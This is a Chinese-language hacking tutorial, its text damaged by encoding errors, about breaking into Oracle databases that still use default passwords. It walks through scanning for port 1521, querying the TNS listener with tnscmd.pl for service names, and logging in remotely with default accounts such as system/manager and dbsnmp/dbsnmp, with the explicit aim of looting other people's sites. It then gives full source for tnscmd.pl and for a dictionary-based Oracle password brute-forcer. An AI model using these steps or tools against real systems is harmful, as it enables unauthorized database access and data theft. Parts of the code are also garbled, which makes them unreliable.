一、先看下面的一個(gè)貼子: Oracle數(shù)據(jù)庫是現(xiàn)在很流行的數(shù)據(jù)庫系統(tǒng)，很多大型網(wǎng)站都采用Oracle，它之所以倍受用戶喜愛是因?yàn)樗幸韵峦怀龅奶攸c(diǎn)： 1、支持大數(shù)據(jù)庫、多用戶的高性能的事務(wù)處理。Oracle支持最大數(shù)據(jù)庫，其大小可到幾百千兆，可充分利用硬件設(shè)備。支持大量用戶同時(shí)在同一數(shù)據(jù)上執(zhí)行各種數(shù)據(jù)應(yīng)用，并使數(shù)據(jù)爭用最小，保證數(shù)據(jù)一致性。系統(tǒng)維護(hù)具有高的性能，Oracle每天可連續(xù)24小時(shí)工作，正常的系統(tǒng)操作(后備或個(gè)別計(jì)算機(jī)系統(tǒng)故障)不會(huì)中斷數(shù)據(jù)庫的使用?？煽刂茢?shù)據(jù)庫數(shù)據(jù)的可用性，可在數(shù)據(jù)庫級(jí)或在子數(shù)據(jù)庫級(jí)上控制。 2、Oracle遵守?cái)?shù)據(jù)存取語言、操作系統(tǒng)、用戶接口和網(wǎng)絡(luò)通信協(xié)議的工業(yè)標(biāo)準(zhǔn)。所以它是一個(gè)開放系統(tǒng)，保護(hù)了用戶的投資。美國標(biāo)準(zhǔn)化和技術(shù)研究所(NIST)對(duì)Oracle7 SERVER進(jìn)行檢驗(yàn)，100%地與ANSI/ISO SQL89標(biāo)準(zhǔn)的二級(jí)相兼容。 3、實(shí)施安全性控制和完整性控制。Oracle為限制各監(jiān)控?cái)?shù)據(jù)存取提供系統(tǒng)可靠的安全性。Oracle實(shí)施數(shù)據(jù)完整性，為可接受的數(shù)據(jù)指定標(biāo)準(zhǔn)。 4、支持分布式數(shù)據(jù)庫和分布處理。Oracle為了充分利用計(jì)算機(jī)系統(tǒng)和網(wǎng)絡(luò)，允許將處理分為數(shù)據(jù)庫服務(wù)器和客戶應(yīng)用程序，所有共享的數(shù)據(jù)管理由數(shù)據(jù)庫管理系統(tǒng)的計(jì)算機(jī)處理，而運(yùn)行數(shù)據(jù)庫應(yīng)用的工作站集中于解釋和顯示數(shù)據(jù)。通過網(wǎng)絡(luò)連接的計(jì)算機(jī)環(huán)境，Oracle將存放在多臺(tái)計(jì)算機(jī)上的數(shù)據(jù)組合成一個(gè)邏輯數(shù)據(jù)庫，可被全部網(wǎng)絡(luò)用戶存取。分布式系統(tǒng)像集中式數(shù)據(jù)庫一樣具有透明性和數(shù)據(jù)一致性。 具有可移植性、可兼容性和可連接性。由于Oracle軟件可在許多不同的操作系統(tǒng)上運(yùn)行，以致Oracle上所開發(fā)的應(yīng)用可移植到任何操作系統(tǒng)，只需很少修改或不需修改。Oracle軟件同工業(yè)標(biāo)準(zhǔn)相兼容，包括很多工業(yè)標(biāo)準(zhǔn)的操作系統(tǒng)，所開發(fā)應(yīng)用系統(tǒng)可在任何操作系統(tǒng)上運(yùn)行?？蛇B接性是指ORALCE允許不同類型的計(jì)算機(jī)和操作系統(tǒng)通過網(wǎng)絡(luò)可共享信息。 雖然Oracle數(shù)據(jù)庫具有很高的安全性，但是如果我們在配置的時(shí)候不注意安全意識(shí)，那么也是很危險(xiǎn)的。也就是說，安全最主要的還是要靠人自己，而不能過分依賴軟件來實(shí)現(xiàn)。 我們知道，在mssql中，安裝完成后默認(rèn)有個(gè)sa的登陸密碼為空，如果不更改就會(huì)產(chǎn)生安全漏洞。那么oracle呢?也有的。為了安裝和調(diào)試的方便，Oracle數(shù)據(jù)庫中的兩個(gè)具有DBA權(quán)限的用戶Sys和System的缺省密碼是manager。筆者發(fā)現(xiàn)很多國內(nèi)網(wǎng)站的Oracle數(shù)據(jù)庫沒有更改這兩個(gè)用戶的密碼，其中也包括很多大型的電子商務(wù)網(wǎng)站， 我們就可以利用這個(gè)缺省密碼去找我們感興趣的東西。如何實(shí)現(xiàn)，看下面的文章吧。 進(jìn)行測試前我們先來了解一些相關(guān)的知識(shí)，我們連接一個(gè)Oracle數(shù)據(jù)庫的時(shí)候，需要知道它的service_name或者是Sid值，就象mssql一樣，需要知道數(shù)據(jù)庫名。那如何去知道呢，猜?呵呵，顯然是不行的。這里我們先講講oracle的TNS listener，它位于數(shù)據(jù)庫Client和數(shù)據(jù)庫Server之間，默認(rèn)監(jiān)聽1521端口，這個(gè)監(jiān)聽端口是可以更改的。但是如果你用一個(gè)tcp的session去連接1521端口的話，oracle將不會(huì)返回它的banner，如果你輸入一些東西的話，它甚至有可能把你踢出去。這里我們就需要用tnscmd.pl這個(gè)perl程序了，它可以查詢遠(yuǎn)程oracle數(shù)據(jù)庫是否開啟(也就是ping了)，查詢版本，以及查詢它的服務(wù)名，服務(wù)狀態(tài)和數(shù)據(jù)庫服務(wù)名，而且正確率很高。 理論方面的講完了，如果還有什么不懂的可以去查找相關(guān)資料?，F(xiàn)在開始測試吧，需要的工具有：ActivePerl，Oracle客戶端，Superscan或者是其它掃描端口的軟件， Tnscmd.pl。 我們先用Superscan掃描開放了端口1521的主機(jī)，假設(shè)其IP是xx.xx.110.110，這樣目標(biāo)已經(jīng)有了。然后我們要做的就是用Tnscmd.pl來查詢遠(yuǎn)程數(shù)據(jù)庫的服務(wù)名了，Tnscmd.pl的用法如下： 　C:perlbin>perl tnscmd.pl usage: tnscmd.pl [command] -h hostname where 'command' is something like ping, version, status, etc. (default is ping) [-p port] - alternate TCP port to use (default is 1521) [--logfile logfile] - write raw packets to specified logfile [--indent] - indent & outdent on parens [--rawcmd command] - build your own CONNECT_DATA string [--cmdsize bytes] - fake TNS command size (reveals packet leakage)
我們下面用的只有簡單的幾個(gè)命令，其他的命令也很好用，一起去發(fā)掘吧。 然后我們就這樣來： 　C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521 writing 91 bytes reading ._.......6.........?. .......... DESCRIPTION= TMP= VSNNUM=135286784 ERR=0 SERVICES_EXIST=1 .Q........ SERVICE= SERVICE_NAME=ORCL INSTANCE= INSTANCE_NAME=ORCL NUM=1 INSTANCE_CLASS=ORACLE HANDLER= HANDLER_DISPLAY=DEDICATED SERVER STA=ready HANDLER_INFO=LOCAL SERVER HANDLER_MAXLOAD=0 HANDLER_LOAD=0 ESTABLISHED=447278 REFUSED=0 HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227 HANDLER_NAME=DEDICATED ADDRESS= PROTOCOL=beq PROGRAM=/home/oracle/bin/oracle ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL' ARGV0=oracleORCL ARGS=' LOCAL=NO ' .........@
從上面得到的信息我們可以看出數(shù)據(jù)庫的服務(wù)名為ORCL，然后我們就可以通過sqlplus工具來遠(yuǎn)程連上它了，用戶名和密碼我們用默認(rèn)的system/manager或者是sys/manager，其他的如mdsys/mdsys，ctxsys/ctxsys等，這個(gè)默認(rèn)用戶和密碼是隨版本的不同而改變的。如下： 　C:oracleora90BIN>sqlplus /nolog SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002 (c) Copyright 2001 Oracle Corporation.　All rights reserved. SQL>connect system/manager@ (description=(address_list=(address=(protocol=tcp) (host=xx.xx.110.110)(port=1521))) (connect_data=(SERVICE_NAME=ORCL))); 如果密碼正確，那么就會(huì)提示connected，如果不行,再換別的默認(rèn)用戶名和密碼。經(jīng)過筆者的嘗試一般用dbsnmp/dbsnmp都能進(jìn)去。當(dāng)然如果對(duì)方已經(jīng)把默認(rèn)密碼改了，那我們只能換別的目標(biāo)了。但是我發(fā)現(xiàn)很多都是不改的，這個(gè)就是安全意識(shí)的問題了。
二、上面提到的兩個(gè)小軟件：
tnscmd.pl Copy code
#!/usr/bin/perl
#
# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp)
# tested under Linux x86 & OpenBSD Sparc perl5
#
# Initial cruft: jwa@jammed.com 5 Oct 2000
#
# $Id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa Exp $
#
# see als
# http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818
# http://otn.oracle.com/deploy/security/alerts.htm
# http://xforce.iss.net/alerts/advise66.php
#
# GPL'd, of course. http://www.gnu.org/copyleft/gpl.html
#
# $Log: tnscmd,v $
# Revision 1.3 2001/04/26 06:45:48 jwa
# typo in url. whoops.
#
# Revision 1.2 2001/04/26 06:42:17 jwa
# complete rewrite
# - use I:Socket instead of tcp_open
# - got rid of pdump()
# - put packet into @list and build it with pack()
# - added --indent option
#
# use I:Socket;
use strict; # a grumpy perl interpreter is your friend select(STDOUT);$|=1; #
# process arguments
# my ($cmd) = $ARGV[0] if ($ARGV[0] !~ /^-/);
my ($arg); while ($arg = shift @ARGV) {
$main::hostname = shift @ARGV if ($arg eq "-h");
$main::port = shift @ARGV if ($arg eq "-p");
$main::logfile = shift @ARGV if ($arg eq "--logfile");
$main::fakepacketsize = shift @ARGV if ($arg eq "--packetsize");
$main::fakecmdsize = shift @ARGV if ($arg eq "--cmdsize");
$main::indent = 1 if ($arg eq "--indent");
$main::rawcmd = shift @ARGV if ($arg eq "--rawcmd");
$main::rawout = shift @ARGV if ($arg eq "--rawout");
} if ($main::hostname eq "") {
print <<_EOF_;
usage: $0 [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)
_EOF_
exit(0);
} # with no commands, default to pinging port 1521 $cmd = "ping" if ($cmd eq "");
$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. DBAs are so whimsical
#
# main
# my ($command); if (defined($main::rawcmd))
{
$command = $main::rawcmd;
}
else
{
$command = "(CONNECT_DATA=(COMMAND=$cmd))";
}
my $response = tnscmd($command);
viewtns($response);
exit(0);
#
# build the packet, open the socket, send the packet, return the response
# sub tnscmd
{
my ($command) = shift @_;
my ($packetlen, $cmdlen);
my ($clenH, $clenL, $plenH, $plenL);
my ($i); print "sending $command to $main::hostname:$main::port\n"; if ($main::fakecmdsize ne "")
{
$cmdlen = $main::fakecmdsize;
print "Faking command length to $cmdlen bytes\n";
}
else
{
$cmdlen = length ($command);
} $clenH = $cmdlen >> 8;
$clenL = $cmdlen & 0xff; # calculate packet length if (defined($main::fakepacketsize))
{
print "Faking packet length to $main::fakepacketsize bytes\n";
$packetlen = $main::fakepacketsize;
}
else
{
$packetlen = length($command) 58; # "preamble" is 58 bytes
} $plenH = $packetlen >> 8;
$plenL = $packetlen & 0xff; $packetlen = length($command) 58 if (defined($main::fakepacketsize)); # decimal offset
# 0: packetlen_high packetlen_low
# 26: cmdlen_high cmdlen_low
# 58: command # the packet. my (@packet) = (
$plenH, $plenL, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,
$clenH, $clenL, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
);
for ($i=0;$i<length($command);$i )
{
push(@packet, ord(substr($command, $i, 1)));
} my ($sendbuf) = pack("C*", @packet); print "connect ";
my ($tns_sock) = I:Socket::INET->new(
PeerAddr => $main::hostname,
PeerPort => $main::port,
Proto => 'tcp',
Type => SOCK_STREAM,
Timeout => 30) || die "connect to $main::hostname failure: $!";
$tns_sock->autoflush(1); print "\rwriting " . length($sendbuf) . " bytes\n"; if (defined($main::logfile))
{
open(SEND, ">$main::logfile.send") || die "can't write $main::logfile.send: $!";
print SEND $sendbuf || die "write to logfile failed: $!";
close(SEND);
} my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf)); if ($count != length($sendbuf))
{
print "only wrote $count bytes?!";
exit 1;
} print "reading\n"; # get fun data
# 1st 12 bytes have some meaning which so far eludes me if (defined($main::logfile))
{
open(REC, ">$main::logfile.rec") || die "can't write $main::logfile.rec: $!";
} my ($buf, $recvbuf); # read until socket EOF
while (sysread($tns_sock, $buf, 128))
{
print REC $buf if (defined($main::logfile));
$recvbuf .= $buf;
}
close (REC) if (defined($main::logfile));
close ($tns_sock);
return $recvbuf;
}
sub viewtns
{
my ($response) = shift @_; # should have a hexdump option . . . if ($main::raw)
{
print $response;
}
else
{
$response =~ tr/\200-\377/\000-\177/; # strip high bits
$response =~ tr/\000-\027/\./;
$response =~ tr/\177/\./; if ($main::indent)
{
parenify($response);
}
else
{
print $response;
}
print "\n";
}
}
sub parenify
{
my ($buf) = shift @_;
my ($i, $c);
my ($indent, $o_indent); for ($i=0;$i<length($buf);$i )
{
$c = substr($buf, $i, 1);
$indent if ($c eq "(");
$indent-- if ($c eq ")");
if ($indent != $o_indent)
{
print "\n" unless(substr($buf, $i 1, 1) eq "(");
print " " x $indent;
$o_indent = $indent;
undef $c;
}
print $c;
}
}
Copy code
/*用鏈表實(shí)現(xiàn)的oracle密碼暴破程序,需要在本地安裝oralce*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <lmcons.h>
#include <winnetwk.h>
#include <time.h>
#include <stdlib.h>
#include <stdlib.h>
#include <iostream>
#include <occi.h>
#pragma comment(lib, "oraocci9.lib") //鏈接到oraocci9.lib庫
//#pragma comment(lib, "msvcrt.lib")
#pragma comment(lib, "msvcprt.lib")
//鏈接到WS2_32.LIB庫:
#pragma comment(lib, "Ws2_32.lib")
//#pragma comment(lib, "liboracle.lib") char target[40]= {0};//目標(biāo)服務(wù)器
char port[40]={0};//SQL端口號(hào)
char db[40]={0};//數(shù)據(jù)庫名 //定義鏈表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo; typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo; //定義NameInfo來表示NameNode結(jié)構(gòu) //
//函數(shù)SQLCheck
//功能:嘗試用不同密碼連接SQL Server,探測出正確的密碼
//
DWORD WINAPI SQLCheck(PVOID pPwd,PVOID uUserName)
{
//定義局部變量
char szBuffer[1025]= {0};
char *pwd=NULL,*UserName=NULL;
char DataBase[255]={0};
//char *user=NULL;
//取得傳遞過來準(zhǔn)備探測的密碼
pwd=(char *)pPwd;
UserName=(char *)uUserName;
//DataBase=(char *)db;
sprintf(DataBase,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(SERVICE_NAME=%s)))",target,port,db);
//printf("DataBase=%s\n",DataBase);
using namespace std;
using namespace oracle::occi; Environment * env=Environment::createEnvironment(Environment::DEFAULT); try{
Connection *conn=env->createConnection(UserName,pwd,(char *)DataBase);
if (conn)
{ printf("\n");
cout << "SUCCESS - createConnection" << endl;

//連接遠(yuǎn)程oracle Server數(shù)據(jù)庫成功
return 1;
}
else
cout << "FAILURE - createConnection" << endl;
return 0; /*Statement*stmt=conn->createStatement("select * from emp");
ResultSet * rset=stmt->executeQuery();
while (rset->next()) {
cout<<"the empno is:"<<rset->getInt(1)<<endl;
cout<<"the ename is:"<<rset->getString(2)<<endl; } */
//stmt->closeResultSet (rset);
// conn->terminateStatement (stmt);
env->terminateConnection (conn); }catch(SQLException ex) {
//printf("\n");
cout<<ex.getMessage();
return 0; }
Environment::terminateEnvironment(env);
return 0;
}
void usage(){ printf("name:oracle password crack v 1.0\n");
printf("author:pt007@vip.sina.com\n\n");
fprintf(stdout,"usage : oracle_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-x port specify the port of oracle\n"
"\t-u username specify the username of oracle\n"
// "\t-p password specify the password of oracle\n"
"\t-d dict specify the dictionary\n"
"\t-i database specify the database's name\n"
//"\t-a automode automatic crack the oracle password \n"
//"\tNote: when u use the -a option, named the username dict user.dic\n"
// "\t password dict pass.dic\n"
);
printf("\nexample: oracle_pwd_crack 127.0.0.1 -x 1521 -u sql_user.dic -d pass.dic -i PLSExtProc\n");

exit(1); } //創(chuàng)建密碼鏈表:
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){ /* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/ //分配內(nèi)存空間在內(nèi)存的動(dòng)態(tài)存儲(chǔ)區(qū)中分配一塊長度為"sizeof(PassInfo)"字節(jié)的連續(xù)區(qū)域,函數(shù)的返回值為該區(qū)域的首地址:
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */ /* init the head node*/
h->Next = NULL;
p = h; for ( i=0; i < NodeNum; i ) //下面是建立鏈表,每個(gè)密碼對(duì)應(yīng)一個(gè)結(jié)點(diǎn):
{ //按sizeof(TCHAR)的長度分配100塊連續(xù)的區(qū)域,并把指向TCHAR類型指針的首地址賦予指針變量szTempPass
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100); if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}

memset(s->password, '\0', 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL; //刪除一個(gè)結(jié)點(diǎn)
p->Next = s;//鏈表指針指向下一個(gè)結(jié)構(gòu)地址
p = s;//下一個(gè)結(jié)構(gòu)的數(shù)據(jù)域賦值 free(szTempPass);//釋放內(nèi)存空間 }

return h;//返回鏈表的頭結(jié)點(diǎn),它存放有第一個(gè)結(jié)點(diǎn)的首地址,沒有數(shù)據(jù) }
//創(chuàng)建用戶名鏈表:
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){ /* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/ //分配內(nèi)存空間在內(nèi)存的動(dòng)態(tài)存儲(chǔ)區(qū)中分配一塊長度為"sizeof(NameInfo)"字節(jié)的連續(xù)區(qū)域,函數(shù)的返回值為該區(qū)域(此處為NameInfo結(jié)構(gòu)的首地址)的首地址: :
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stdout, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */ /* init the head node*/
h->Next = NULL; //刪除下一個(gè)結(jié)點(diǎn)
p = h; //p里面目前指向頭結(jié)點(diǎn) for ( i=0; i < NodeNum; i )
{//按sizeof(TCHAR)的長度分配100塊連續(xù)的區(qū)域,并把指向TCHAR類型指針的首地址賦予指針變量szTempPass:
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);//字符串類型變量清0 if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stdout, "malloc failed %d", GetLastError());
exit(0);
}

memset(s->Name, '\0', 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;//p指向下一個(gè)結(jié)點(diǎn)的地址
p = s;//下一個(gè)結(jié)構(gòu)的數(shù)據(jù)域賦值 free(szTempName); }

return h; }
int LineCount(FILE * fd) //返回字典中的密碼數(shù)量
{
int countline = 0;
char data[100] = {0};//字符數(shù)組清0 while (fgets(data, 100, fd))//從指定的文件中讀一個(gè)字符串到字符數(shù)組中
countline ; rewind(fd);//指針返回到文件起始處 return countline;

} BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //檢查數(shù)據(jù)是否可寫
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata); if(recv != 0)
{
printf("init failed %d.\n",WSAGetLastError());
return(0);
} if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//創(chuàng)建socket套接字連接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{

printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
//將套接字fd設(shè)為非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value); if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return(0);
} memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr); timer4.tv_sec = 5;//以秒為單位指定等待時(shí)間
timer4.tv_usec = 0; FD_ZERO(&writefd);
FD_SET(fd,&writefd); //將套接字fd增添到writefd寫集合中進(jìn)行測試 recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr)); if( FD_ISSET(fd, &writefd))
{
recv = select(fd 1, NULL, &writefd, NULL, &timer4);//測試5秒鐘內(nèi)是否有數(shù)據(jù)寫入 if( recv > 0 )
Result = TRUE;
} closesocket(fd);
WSACleanup(); return Result; }
int main(int argc, char **argv)
{ PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0; /////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
//參數(shù)不為8個(gè)的時(shí)候打印幫助
if(argc != 10)
usage(); if (argc == 10)
{
if ( strcmpi(argv[2], "-x") )
usage(); if ( strcmpi(argv[4], "-u") )
usage(); if ( strcmpi(argv[6], "-d") )
usage();
if ( strcmpi(argv[8], "-i") )
usage();

} /* determinate whether the oracle port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Can't connect to %s:%d\n", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
////////////////////////////////////////////////////////////////////////////////////////////// //取得目標(biāo)地址和端口號(hào):
strcpy(target,argv[1]);
strcpy(port,argv[3]);
strcpy(db,argv[9]); if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */ FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Can't open the password dictionary\n");
exit(0);
}



/* count line of name dictionary */ passcount = LineCount(passdic); //計(jì)算密碼的數(shù)量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next; //指向第一個(gè)結(jié)點(diǎn) /* open the password dictionary */ FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Can't open the name dictionary\n");
exit(0);
} /*密碼最終保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at ")) ==NULL){
fprintf(stdout, "Can't write pass.txt file!\n");
exit(0);
} /* count line of name dictionary */ namecount = LineCount(Namedict);//計(jì)算用戶名數(shù)量
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next; int j=0,i=1;
while(currnode!=NULL) //為NULL表示姓名鏈表結(jié)束
{
printf("\n開始第%d位用戶%s測試:\n", j,currnode->Name);
while(curr != NULL) //為NULL表示密碼鏈表結(jié)束
{
printf("Now cracking %s->%s \n", currnode->Name, curr->password);
fflush(NULL);
int Cracked=0;
Cracked=SQLCheck(curr->password,currnode->Name);
if ( Cracked==1 )
{
printf("%d.Successfully:oracle server %s's username [%s] password [%s]\n",j,target,currnode->Name, curr->password);
fseek(passtxt, 0L, SEEK_END);//移動(dòng)到文件尾部
fprintf(passtxt,"%d.Successfully:oracle server %s's username [%s] password [%s]\r\n",i ,target,currnode->Name, curr->password);
//exit(0);發(fā)現(xiàn)一個(gè)密碼就退出
break;
}
curr = curr->Next;//移動(dòng)到下一個(gè)結(jié)點(diǎn)
Sleep(100);//暫停100ms,即0.1s } /* starting crack the oracle password*/
currnode = currnode->Next;
curr = head ->Next; //移到密碼鏈表的第一個(gè)結(jié)點(diǎn)
}
printf("\n\n密碼猜解結(jié)束:\n本次共猜解了%d位用戶,%d個(gè)密碼!\n",namecount,passcount);
printf("請(qǐng)使用\"type pass.txt\"來查看當(dāng)前目錄下的pass.txt文件!\n");
fprintf(passtxt,"\r\n\r\n");
fclose(passdic);
fclose(Namedict);
fclose(passtxt);
free(head);
} return 0; }

最新評(píng)論